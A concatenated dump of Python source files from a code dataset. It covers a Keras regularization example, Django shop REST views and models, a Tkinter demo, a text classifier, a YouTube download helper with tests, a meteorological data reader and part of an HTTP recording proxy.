activation='relu', input_shape=(10000,)))\n model.add(layers.Dense(16, activation='relu'))\n model.add(layers.Dense(1, activation='sigmoid'))\n return model\n\n\ndef get_regularized_model():\n model = models.Sequential()\n # l2(0.001) means every coefficient in the weight matrix of\n # the layer will add 0.001 * weight_coefficient_value to the\n # total loss of the network\n model.add(layers.Dense(16, kernel_regularizer=regularizers.l2(0.001), activation='relu', input_shape=(10000,)))\n model.add(layers.Dense(16, kernel_regularizer=regularizers.l2(0.001), activation='relu', input_shape=(10000,)))\n model.add(layers.Dense(1, activation='sigmoid'))\n return model\n\n\ndef get_l1l2regularized_model():\n model = models.Sequential()\n model.add(layers.Dense(16, kernel_regularizer=regularizers.l1_l2(0.001, 0.001), activation='relu', input_shape=(10000,)))\n model.add(layers.Dense(16, kernel_regularizer=regularizers.l1_l2(0.001, 0.001), activation='relu', input_shape=(10000,)))\n model.add(layers.Dense(1, activation='sigmoid'))\n return model\n\n\n# Model and Layers Definition\n\nx_val = x_train[:10000]\npartial_x_train = x_train[10000:]\n\ny_val = y_train[:10000]\npartial_y_train = y_train[10000:]\n\n\ndef get_losses(model):\n model.compile(optimizer='rmsprop',\n loss='binary_crossentropy',\n metrics=['accuracy'])\n\n history = model.fit(partial_x_train,\n partial_y_train,\n epochs=20,\n batch_size=512,\n validation_data=(x_val, y_val))\n\n return history.history['loss'], history.history['val_loss'], history.history['acc'], history.history['val_acc']\n\n\noriginal_loss, original_val_loss, original_acc, original_val_acc = get_losses(get_original_model())\nregularized_loss, regularized_val_loss, regularized_acc, regularized_val_acc = get_losses(get_regularized_model())\nl1l2regularized_loss, l1l2regularized_val_loss, l1l2regularized_acc, l1l2regularized_val_acc = get_losses(get_l1l2regularized_model())\n\n\nepochs = range(1, len(original_loss) + 1)\n\nplt.plot(epochs, original_loss, 'bo', label='Original model')\nplt.plot(epochs, regularized_loss, 'b', label='L2Regularized model')\nplt.plot(epochs, l1l2regularized_loss, 'r', label='L1L2Regularized model')\nplt.xlabel('Epochs')\nplt.ylabel('Training Loss')\nplt.legend()\nplt.show()\n\n\nplt.plot(epochs, original_val_loss, 'bo', label='Original model')\nplt.plot(epochs, regularized_val_loss, 'b', label='L2Regularized model')\nplt.plot(epochs, l1l2regularized_val_loss, 'r', label='L1L2Regularized model')\nplt.xlabel('Epochs')\nplt.ylabel('Validation Loss')\nplt.legend()\nplt.show()\n\nplt.plot(epochs, original_acc, 'bo', label='Original model')\nplt.plot(epochs, regularized_acc, 'b', label='L2Regularized model')\nplt.plot(epochs, l1l2regularized_acc, 'r', label='L1L2Regularized model')\nplt.xlabel('Epochs')\nplt.ylabel('Training Accuracy')\nplt.legend()\nplt.show()\n\n\nplt.plot(epochs, original_val_acc, 'bo', label='Original model')\nplt.plot(epochs, regularized_val_acc, 'b', label='L2Regularized model')\nplt.plot(epochs, l1l2regularized_val_acc, 'r', label='L1L2Regularized model')\nplt.xlabel('Epochs')\nplt.ylabel('Validation Accuracy')\nplt.legend()\nplt.show()\n","sub_path":"chapter4/weight_regularization.py","file_name":"weight_regularization.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"147543529","text":"import logging\nfrom django.http import Http404, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import viewsets, status\nfrom rest_framework.decorators import action\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom main.models import Category, Item, CreditCard, ShoppingCart, Order\nfrom main.serializers import CategorySerializer, ItemSerializer, CreditCardSerializer, ShoppingCartSerializer, \\\n OrderSerializer\nfrom django.shortcuts import get_object_or_404, get_list_or_404\n\nlogger = logging.getLogger(__name__)\n\n\nclass CategoryViewSet(viewsets.ViewSet):\n permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n queryset = Category.objects.all()\n serializer = CategorySerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Category.objects.all()\n user = get_object_or_404(queryset, pk=pk)\n serializer = CategorySerializer(user)\n return Response(serializer.data)\n\n @action(methods=['POST'], detail=False, permission_classes=(IsAdminUser, ))\n def create(self, request):\n category_data = request.data\n new_category = Category.objects.create(category_name=category_data['category_name'])\n new_category.save()\n serializer = CategorySerializer(new_category)\n logger.debug(f'Category object created, ID: {serializer.instance}')\n logger.info(f'Category object created, ID: {serializer.instance}')\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n try:\n instance = Category.objects.get(id=pk)\n instance.delete()\n logger.debug(f'Category object deleted, ID: {instance}')\n logger.info(f'Category object deleted, ID: {instance}')\n except Http404:\n logger.error(f'Category object cannot be deleted')\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n @action(methods=['PUT'], detail=False, permission_classes=(IsAdminUser, ))\n def update(self, request, pk):\n category = Category.objects.get(id=pk)\n category.category_name = request.data['category_name']\n category.save()\n serializer = CategorySerializer(category)\n logger.debug(f'Category object updated, ID: {serializer.instance}')\n logger.info(f'Category object updated, ID: {serializer.instance}')\n return Response(serializer.data)\n\n\nclass ItemViewSet(viewsets.ViewSet):\n permission_classes = (IsAuthenticated, )\n\n def list(self, request):\n queryset = Item.objects.all()\n serializer = ItemSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def retrieve(self, request, pk=None):\n queryset = Item.objects.filter(category=pk)\n user = get_list_or_404(queryset)\n serializer = ItemSerializer(user, many=True)\n return Response(serializer.data)\n\n @action(methods=['POST'], detail=False, permission_classes=(IsAdminUser,))\n def create(self, request):\n item_data = request.data\n category = Category.objects.get(id=item_data['category'])\n new_item = Item.objects.create(item_name=item_data['item_name'], price=item_data['price'],\n description=item_data['description'], category=category)\n new_item.save()\n serializer = ItemSerializer(new_item)\n logger.debug(f'Item object created, ID: {serializer.instance}')\n logger.info(f'Item object created, ID: {serializer.instance}')\n return Response(serializer.data)\n\n def destroy(self, request, pk):\n try:\n instance = Item.objects.get(id=pk)\n instance.delete()\n logger.debug(f'Item object deleted, ID: {instance}')\n logger.info(f'Item object deleted, ID: {instance}')\n except Http404:\n logger.error(f'Item object cannot be deleted')\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def select(self, request, pk=None):\n queryset = Item.objects.all()\n user = get_object_or_404(queryset, pk=pk)\n serializer = ItemSerializer(user)\n return Response(serializer.data)\n\n @action(methods=['PUT'], detail=False, permission_classes=(IsAdminUser, ))\n def update(self, request, pk):\n _item = Item.objects.get(id=pk)\n _item.item_name = request.data['item_name']\n _item.price = request.data['price']\n _item.description = request.data['description']\n category = Category.objects.get(category_name=request.data['category'])\n _item.category = category\n _item.save()\n serializer = ItemSerializer(_item)\n logger.debug(f'Item object updated, ID: {serializer.instance}')\n logger.info(f'Item object updated, ID: {serializer.instance}')\n return Response(serializer.data)\n\n\n@csrf_exempt\ndef credit_card(request):\n if request.method == 'GET':\n credit_cards = CreditCard.objects.all()\n serializer = CreditCardSerializer(credit_cards, many=True)\n return JsonResponse(serializer.data, safe=False)\n elif request.method == 'POST':\n json_data = JSONParser().parse(request)\n serializer = CreditCardSerializer(data=json_data)\n if serializer.is_valid():\n serializer.save()\n logger.debug(f'CreditCard object created, ID: {serializer.instance}')\n logger.info(f'CreditCard object created, ID: {serializer.instance}')\n return JsonResponse(serializer.data, safe=False)\n else:\n logger.error(f'CreditCard object is not created, ID: {serializer.errors}')\n return JsonResponse(serializer.errors, safe=False)\n\n\nclass CreditCardAPIView(APIView):\n permission_classes = (IsAuthenticated, )\n\n def get_object(self, pk):\n try:\n return CreditCard.objects.get(pk=pk)\n except CreditCard.DoesNotExist:\n raise Http404\n\n def put(self, request, pk, format=None):\n card = self.get_object(pk)\n serializer = CreditCardSerializer(card, data=request.data)\n if serializer.is_valid():\n serializer.save()\n logger.debug(f'CreditCard object updated, ID: {serializer.instance}')\n logger.info(f'CreditCard object updated, ID: {serializer.instance}')\n return Response(serializer.data)\n logger.error(f'CreditCard object cannot be updated, {serializer.errors}')\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n card = self.get_object(pk)\n card.delete()\n logger.debug(f'CreditCard object deleted')\n logger.info(f'CreditCard object deleted')\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass ShoppingCartAPIView(APIView):\n permission_classes = (IsAuthenticated, )\n\n def get_object(self, pk):\n try:\n return ShoppingCart.objects.get(customer_id=pk)\n except ShoppingCart.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n shopping_cart = self.get_object(pk)\n serializer = ShoppingCartSerializer(shopping_cart)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n shopping_cart = self.get_object(pk)\n serializer = ShoppingCartSerializer(shopping_cart, data=request.data)\n if serializer.is_valid():\n serializer.save()\n logger.debug(f'ShoppingCart object updated, ID: {serializer.instance}')\n logger.info(f'ShoppingCart object updated, ID: {serializer.instance}')\n return Response(serializer.data)\n logger.error(f'ShoppingCart object cannot be updated')\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n shopping_cart = self.get_object(pk)\n shopping_cart.delete()\n logger.debug(f'ShoppingCart object deleted')\n logger.info(f'ShoppingCart object deleted')\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n@csrf_exempt\ndef shopping_cart(request):\n if request.method == 'POST':\n json_data = JSONParser().parse(request)\n serializer = ShoppingCartSerializer(data=json_data)\n if serializer.is_valid():\n serializer.save()\n logger.debug(f'ShoppingCart object created, ID: {serializer.instance}')\n logger.info(f'ShoppingCart object created, ID: {serializer.instance}')\n return JsonResponse(serializer.data, safe=False)\n else:\n logger.error(f'ShoppingCart object cannot be created, {serializer.errors}')\n return JsonResponse(serializer.errors, safe=False)\n\n\nclass OrderAPIView(APIView):\n permission_classes = (IsAuthenticated, )\n\n def get_object(self, pk):\n try:\n return Order.objects.get(pk=pk)\n except Order.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n order = self.get_object(pk)\n serializer = OrderSerializer(order)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n order= self.get_object(pk)\n serializer = OrderSerializer(order, data=request.data)\n if serializer.is_valid():\n serializer.save()\n logger.debug(f'Order object updated, ID: {serializer.instance}')\n logger.info(f'Order object updated, ID: {serializer.instance}')\n return Response(serializer.data)\n logger.error(f'Order object cannot be updated, {serializer.errors}')\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n order = self.get_object(pk)\n order.delete()\n logger.debug(f'Order object deleted')\n logger.info(f'Order object deleted')\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n@csrf_exempt\ndef orders(request):\n if request.method == 'GET':\n all_orders = Order.objects.all()\n serializer = OrderSerializer(all_orders, many=True)\n return JsonResponse(serializer.data, safe=False)\n elif request.method == 'POST':\n json_data = JSONParser().parse(request)\n serializer = OrderSerializer(data=json_data)\n if serializer.is_valid():\n serializer.save()\n logger.debug(f'Order object created, ID: {serializer.instance}')\n logger.info(f'Order object created, ID: {serializer.instance}')\n return JsonResponse(serializer.data, safe=False)\n else:\n logger.error(f'Order object cannot be created, {serializer.errors}')\n return JsonResponse(serializer.errors, safe=False)\n\n\n# def cart_add_item(request, pk):\n# cart = ShoppingCart(request)\n# item = Item.objects.get(id=pk)\n# cart.cart_items.add(item)\n# return redirect(\"items/\")\n","sub_path":"endterm/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"323666928","text":"from django.db import models\nfrom datetime import datetime\nfrom datetime import datetime, timedelta\nimport django.db.models.options as options\nimport json\noptions.DEFAULT_NAMES = options.DEFAULT_NAMES + ('fields_searchable',)\n\n# Create your models here.\n\nclass Auditprocess(models.Model):\n\n PROCESS_INCREMENTAL=\"Incremental\"\n PROCESS_ONLY_BACKLOG=\"Only Backlog\"\n PROCESS_ANALYSIS_BACKLOG=\"Analysis Backlog\"\n\n process = models.CharField(max_length=255, blank=True, null=True)\n status = models.CharField(max_length=255, blank=True, null=True)\n start_date = models.DateTimeField(auto_now_add=False, null=True, editable=False)\n end_date = models.DateTimeField(auto_now_add=False, null=True, editable=False)\n timestamp_date = models.DateTimeField(auto_now_add=True, editable=False)\n initial_records = models.IntegerField(blank=True, null=True)\n final_records = models.IntegerField(blank=True, null=True)\n pid = models.CharField(max_length=10, blank=True, null=True)\n msg = models.TextField(blank=True, null=True)\n\n def setInitial(self, data):\n\n self.process=data[\"process\"] \n self.status=\"Initial\"\n if (\"pid\" in data):\n self.pid=data[\"pid\"]\n self.timestamp_date=datetime.now()\n self.start_date=datetime.now()\n if (\"msg\" in data):\n self.msg=data[\"msg\"]\n self.save()\n\n def setInProgress(self, data):\n\n self.status=\"In progress\"\n self.timestamp_date=datetime.now()\n if \"initial_records\" in data:\n self.initial_records=data[\"initial_records\"]\n if (\"msg\" in data):\n self.msg=data[\"msg\"]\n self.save()\n \n def setFinished(self, data):\n\n self.status=\"Finished\"\n self.timestamp_date=datetime.now()\n if \"final_records\" in data:\n self.final_records=data[\"final_records\"]\n self.end_date=datetime.now()\n if (\"msg\" in data):\n self.msg=data[\"msg\"]\n self.save()\n \n def setCancelled(self, data):\n\n self.status=\"Cancelled\"\n self.timestamp_date=datetime.now()\n if \"final_records\" in data:\n self.final_records=data[\"final_records\"]\n self.end_date=datetime.now()\n if (\"msg\" in data):\n self.msg=data[\"msg\"]\n self.save()\n\n def setError(self, data):\n\n self.status=\"Error\"\n self.timestamp_date=datetime.now()\n self.end_date=datetime.now()\n if (\"msg\" in data):\n self.msg=data[\"msg\"]\n self.save()\n\n class Meta:\n ordering = ('id',)\n fields_searchable = '__all__'\n\n","sub_path":"auditprocess/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"146574352","text":"# coding: utf-8\n#########################################################################\n# 网站: 疯狂Java联盟 #\n# author yeeku.H.lee kongyeeku@163.com #\n# #\n# version 1.0 #\n# #\n# Copyright (C), 2001-2018, yeeku.H.Lee #\n# #\n# This program is protected by copyright laws. #\n# #\n# Program Name: #\n# #\n#
Date: #\n#########################################################################\nfrom tkinter import *\n# 导入ttk\nfrom tkinter import ttk\nclass App:\n def __init__(self, master):\n self.master = master\n self.initWidgets()\n def initWidgets(self):\n # 创建一个Label组件\n ttk.Label(self.master, text='选择您喜欢的兵种:')\\\n .pack(fill=BOTH, expand=YES)\n self.intVar = IntVar()\n # 定义元组\n races = ('z.png', 'p.pNg','t.png')\n raceNames = ('虫族', '神族','人族')\n i = 1\n # 采用循环创建多个Radiobutton\n for rc in races:\n bm = PhotoImage(file = 'images/' + rc)\n r = ttk.Radiobutton(self.master, \n image = bm,\n text = raceNames[i - 1],\n compound = RIGHT, # 图片在文字右边\n variable = self.intVar, # 将Radiobutton绑定到self.intVar变量\n command = self.change, # 将选中事件绑定到self.change方法\n value=i)\n r.bm = bm\n r.pack(anchor=W)\n i += 1\n # 设置默认选中value为2的单选按钮\n self.intVar.set(2)\n def change(self): pass\nroot = Tk()\nroot.title(\"Radiobutton测试\")\n# 改变窗口图标\nroot.iconbitmap('images/fklogo.ico')\nApp(root)\nroot.mainloop()\n","sub_path":"官方配套代码/11/11.5/Radiobutton_test2.py","file_name":"Radiobutton_test2.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"324725005","text":"import numpy as np\nimport pickle\nimport re\nimport nltk\nfrom sklearn.ensemble import RandomForestClassifier\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\n\n\ndef predict():\n pkl_filename = \"pickle_model.pkl\"\n model, vectorize=pickle.load(open(pkl_filename, 'rb')) \n comment_file = pd.read_csv(\"./comments.csv\")\n flags,comments_id,comments = list(comment_file[\"flag\"]),list(comment_file[\"comments_id\"]),list(comment_file[\"comments\"]) \n processed_comments = []\n # Almost copy-pasted part from line 15 to 28. Removing emojis and other useless information\n for sentence in range(0, len(comments)):\n if(flags[sentence]):\n # Remove all the special characters\n being_processed = re.sub(r'\\W', ' ', str(comments[sentence]))\n # remove all single characters\n being_processed= re.sub(r'\\s+[a-zA-Z]\\s+', ' ', being_processed)\n # Remove single characters from the start\n being_processed = re.sub(r'\\^[a-zA-Z]\\s+', ' ', being_processed) \n # Substituting multiple spaces with single space\n being_processed = re.sub(r'\\s+', ' ', being_processed, flags=re.I)\n # Removing prefixed 'b'\n being_processed = re.sub(r'^b\\s+', '', being_processed)\n # Converting to Lowercase\n being_processed = being_processed.lower()\n processed_comments.append(being_processed)\n else:\n processed_comments.append(\"empty\")\n X_predict = vectorize.transform(processed_comments).toarray()\n Y_predict=model.predict(X_predict)\n # I want this Y_predict to return a list of 0,4\n # 0 -> \n # 4 -> \n return Y_predict","sub_path":"Prediction.py","file_name":"Prediction.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"315546935","text":"from django.urls import path\nfrom webapp.views import OrderListView, OrderCreateView, OrderfoodCreateView, OrderUpdateView,\\\n FoodCreateView, FoodDeleteView, FoodUpdateView, FoodListView, \\\n OrderfoodDeleteView, CourierListView, change_status, change_status_courier_1,\\\n change_status_courier_2, change_status_courier_3, DetailListView, \\\n OrderFoodAjaxCreateView, OrderFoodAjaxUpdateView, OrderFoodAjaxDeleteView\napp_name = 'webapp'\n\nurlpatterns = [\n path('', OrderListView.as_view(), name='order_list'),\n path('menu', FoodListView.as_view(), name='food_list'),\n path('food/create', FoodCreateView.as_view(), name='food_add'),\n path('food//update', FoodUpdateView.as_view(), name='food_update'),\n path('food//delete', FoodDeleteView.as_view(), name='food_delete'),\n path('order_food//delete_food', OrderfoodDeleteView.as_view(), name='order_food_delete'),\n path('order/create', OrderCreateView.as_view(), name='order_add'),\n path('order//order_food', OrderfoodCreateView.as_view(), name='order_food_add'),\n path('courier', CourierListView.as_view(), name='courier_list'),\n path('order//update', OrderUpdateView.as_view(), name='order_update'),\n path('order//change_status', change_status, name='change_status'),\n path('order//change_status_courier_1', change_status_courier_1, name='change_status_courier_1'),\n path('order//change_status_courier_2', change_status_courier_2, name='change_status_courier_2'),\n path('order//change_status_courier_3', change_status_courier_3, name='change_status_courier_3'),\n path('order_food//update', DetailListView.as_view(), name='order_detail'),\n # ----------------------------------------------------------------------------------------------------------------\n path('order//food/create', OrderFoodAjaxCreateView.as_view(), name='order_food_create'),\n path('order/food//update', OrderFoodAjaxUpdateView.as_view(), name='order_food_update'),\n path('order//food/delete', OrderFoodAjaxDeleteView.as_view(), name='order_food_delete_ajax'),\n]\n\n","sub_path":"source/webapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"444472107","text":"import unittest\nimport requests\nimport downloadFunction\nfrom bs4 import BeautifulSoup\n\n#Query youtube with search input and return result as HTML String\ndef queryYoutube(input):\n prefix = \"https://www.youtube.com/results?search_query=\"\n postfix = \"&sp=EgIYAQ%253D%253D\"\n fixedInput = fixInput(input)\n url = prefix + fixedInput + postfix\n page = requests.get(url)\n return page.content\n\ndef isWatchLink(link):\n return link.startswith(\"/watch?v=\")\n\n#Given an HTML Youtube Result page, return all results parsed into a String Array\ndef parseDownloadLinkFromYT(page):\n soup = BeautifulSoup(page, 'html.parser')\n aset = set()\n for link in soup.find_all('a'):\n linkhref = link.get('href')\n if isWatchLink(linkhref):\n prefix = \"https://www.youtube.com\"\n youtubeLink = prefix + linkhref\n aset.add(youtubeLink)\n for link in aset:\n print(link)\n return aset\n\n\ndef printResult(result):\n if result == True:\n print(\"Files has been downloaded successfully\")\n else:\n print(\"Files has failed\")\n\ndef fixInput(input):\n output = input.replace(' ', '+')\n return output\n\n# Here's our \"unit tests\".\nclass functionTests(unittest.TestCase):\n\n def testQueryYoutube(self):\n input= \"Stuff\"\n actural = queryYoutube(input)\n self.assertTrue(len(actural) > 500)\n\n def testParseDownloadLink(self):\n page = queryYoutube(\"stuff\")\n result = parseDownloadLinkFromYT(page)\n self.assertIsNotNone(result)\n self.assertTrue(len(result) > 9)\n\n def testIsWatchLink(self):\n success = \"/watch?v=7RDSLzHJ74I\"\n self.assertTrue(isWatchLink(success))\n failure = \"ABCDE\"\n self.assertFalse(isWatchLink(failure))\n\n def testDownload(self):\n link = \"https://www.youtube.com/watch?v=FZvtATBfSpM\"\n self.assertTrue(downloadFunction.download(link))\n\n def testDownloadList(self):\n aset = set()\n aset.add(\"https://www.youtube.com/watch?v=uw7R_RGAd9I\")\n aset.add(\"https://www.youtube.com/watch?v=q-H62GgHjeg\")\n aset.add(\"https://www.youtube.com/watch?v=V7vjxhqMPng\")\n self.assertTrue(downloadFunction.downloadList(aset))\n\n def testFixInput(self):\n name = \"Cosmic Gate\"\n result = \"Cosmic+Gate\"\n actural = fixInput(name)\n self.assertEqual(actural, result)\n\ndef main():\n unittest.main()\n\nif __name__ == '__main__':\n main()","sub_path":"searchNetworkFunctions.py","file_name":"searchNetworkFunctions.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"85730830","text":"from matplotlib.dates import date2num\n\nimport datetime as dt\nimport logging\nimport numpy as np\nimport os\nimport scipy.io as sio\n\nimport networkNames as names\n\nimport mospat_inc_directories as IncDir\nimport mospat_utils_equation\nimport IncludeFile as IncF\nfrom INetwork import INetwork\nfrom aux_operations import naive_num2date\n\n\n\nclass LaObra(INetwork):\n\n def setName(self):\n return names.laobra\n\n def read(self, c_Variable, c_Network):\n t_VarsUnits = {'TEMP': 'degreeC', 'WSPEED': 'm s-1', 'RH': 'percent', 'VD': 'degrees',\n 'WSPEEDU': 'm s-1', 'WSPEEDV': 'm s-1', 'BCAR': 'ug m-3', 'PM25': 'ug m-3',\n 'PM10': 'ug m-3', 'SO2': 'ppb', 'O3': 'ppb', 'CO': 'ppm',\n 'NOX': 'ppb', 'CH4': 'ppmC', 'HCNM': 'ppm', 'NO': 'ppb',\n 'NO2': 'ppb', 'NH3': 'g m-3'}\n\n t_ObsStationData = dict()\n c_ObsNetDirs = IncDir.c_ObsNetDir\n c_ObsNetName = IncDir.c_ObsNetName\n idx_Net = c_ObsNetName.index(c_Network)\n c_Files = os.listdir(c_ObsNetDirs[idx_Net])\n logging.info('Data Directory: %s' % c_ObsNetDirs[idx_Net])\n c_FileName = c_Files[1]\n logging.info('Reading file: %s' % c_FileName)\n c_ObsFiles = c_ObsNetDirs[idx_Net] + c_FileName\n f_alldatafile_aux = sio.loadmat(c_ObsFiles, squeeze_me=True, struct_as_record=False)\n f_alldatafile = sio.loadmat(c_ObsFiles)\n f_alltime_aux = f_alldatafile['datalaobra2']['time'][0][0][::12] - 366\n d_alltime_aux = [naive_num2date(f_T[0]) + dt.timedelta(hours=IncF.i_TimeZone) for f_T in f_alltime_aux]\n f_alltime_aux = [date2num(d_T) for d_T in d_alltime_aux]\n f_date_i = date2num(dt.datetime.strptime(IncF.c_Start_Date[0], '%d-%m-%Y'))\n f_date_f = date2num(dt.datetime.strptime(IncF.c_Last_Date[0], '%d-%m-%Y'))\n f_Stntime = []\n d_Stntime = []\n f_date_aux = f_date_i\n d_date_aux = naive_num2date(f_date_i)\n while f_date_aux <= f_date_f + 23 / 24.:\n f_Stntime.append(date2num(d_date_aux))\n d_Stntime.append(d_date_aux)\n d_date_aux = d_date_aux + dt.timedelta(hours=1)\n f_date_aux = date2num(d_date_aux)\n d_alltime = d_Stntime\n f_alltime = f_Stntime\n i_start = np.where(np.array(f_alltime_aux) >= f_date_i)[0][0]\n i_end = np.where(np.array(f_alltime_aux) <= f_date_f)[0][-1]\n\n if c_Variable == 'WSPEED':\n c_Var = 'vels'\n elif c_Variable == 'VD':\n c_Var = 'dirv'\n elif c_Variable == 'TEMP':\n c_Var = 'temp'\n elif c_Variable == 'P':\n c_Var = 'pres'\n elif c_Variable == 'RH':\n c_Var = 'hrel'\n else:\n c_Var = c_Variable\n\n if c_Var in f_alldatafile_aux[\n 'datalaobra2']._fieldnames or c_Var == 'WSPEEDU' or c_Var == 'WSPEEDV' or c_Var == 'Q' or c_Var == 'POT':\n if c_Var == 'WSPEEDU' or c_Var == 'WSPEEDV':\n f_AllVarDataVV = f_alldatafile['datalaobra2']['vels'][0][0][::12]\n f_AllVarDataVD = f_alldatafile['datalaobra2']['dirv'][0][0][::12]\n if c_Var == 'WSPEEDU':\n f_AllVarData = -np.sin(f_AllVarDataVD * np.pi / 180.) * f_AllVarDataVV\n if c_Var == 'WSPEEDV':\n f_AllVarData = -np.cos(f_AllVarDataVD * np.pi / 180.) * f_AllVarDataVV\n elif c_Var == 'Q':\n f_AllVarDataT = f_alldatafile['datalaobra2']['temp'][0][0][::12]\n f_AllVarDataP = f_alldatafile['datalaobra2']['pres'][0][0][::12]\n f_AllVarDataRH = f_alldatafile['datalaobra2']['hrel'][0][0][::12]\n f_AllVarDataRsat = mospat_utils_equation.mospat_utils_rsat(f_AllVarDataP, f_AllVarDataT)\n f_AllVarData = f_AllVarDataRH * f_AllVarDataRsat / 100.\n elif c_Var == 'POT':\n f_AllVarDataT = f_alldatafile['datalaobra2']['temp'][0][0][::12]\n f_AllVarDataP = f_alldatafile['datalaobra2']['pres'][0][0][::12]\n f_AllVarData = mospat_utils_equation.mospat_utils_tpot(f_AllVarDataT, f_AllVarDataP)\n else:\n f_AllVarData = f_alldatafile['datalaobra2'][c_Var][0][0][::12]\n f_VarData = f_AllVarData[i_start:i_end + 24][np.in1d(f_alltime_aux[i_start:i_end + 24], f_alltime)]\n t_ObsStationData['f_Time'] = np.array([f_alltime])\n t_ObsStationData['d_Time'] = np.array([d_alltime])\n t_ObsStationData['f_Lat'] = np.array([-33.6])\n t_ObsStationData['f_Lon'] = np.array([-70.483])\n t_ObsStationData['f_Elevation'] = np.array([720])\n t_ObsStationData['c_StationName'] = np.array(['LaObra'])\n t_ObsStationData[c_Variable] = np.array([f_VarData[:, 0]])\n t_ObsStationData['t_Units'] = dict()\n if c_Variable in t_VarsUnits:\n t_ObsStationData['t_Units'][c_Variable] = t_VarsUnits[c_Variable]\n return t_ObsStationData, 'Hourly'\n else:\n return t_ObsStationData, None\n","sub_path":"read/networks/LaObra.py","file_name":"LaObra.py","file_ext":"py","file_size_in_byte":5085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"335025741","text":"# Servirtium: Service Virtualized HTTP\n#\n# Copyright (c) 2019, Paul Hammant and committers\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n# The views and conclusions contained in the software and documentation are those\n# of the authors and should not be interpreted as representing official policies,\n# either expressed or implied, of the Servirtium project.\nimport itertools\nimport sys\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\nimport requests\nfrom definitions import MOCKS_DIR\nfrom interaction_recording import InteractionRecording\nfrom servirtium.interactions import Interaction\n\n\ndef _prune_headers(headers, removables):\n def _to_be_removed(item):\n (key, value) = item\n line = f'{key}: {value}'\n any([line.startswith(removable) for removable in removables])\n\n return dict(itertools.filterfalse(_to_be_removed, headers.items()))\n\n\nclass Interception:\n def __init__(self,\n host: str = \"default_host\",\n request_header_overrides: dict = None,\n response_headers_to_remove: list = None) -> None:\n self.host = host\n self.request_header_overrides = request_header_overrides or {}\n self.response_headers_to_remove = response_headers_to_remove or []\n self.current_recording = InteractionRecording()\n\n def modified_request_headers(self, new_req_headers):\n modified = new_req_headers.copy()\n modified.update(self.request_header_overrides)\n return modified\n\n def modified_response_headers(self, response):\n return _prune_headers(response.headers, self.response_headers_to_remove)\n\n def real_service_host(self):\n return self.host.replace('http://', '')\n\n\n# noinspection PyPep8Naming\nclass RecorderHttpHandler(BaseHTTPRequestHandler):\n interception = Interception()\n invoking_method = 'default_method'\n\n @staticmethod\n def set_invoking_method(method_name):\n RecorderHttpHandler.invoking_method = method_name\n 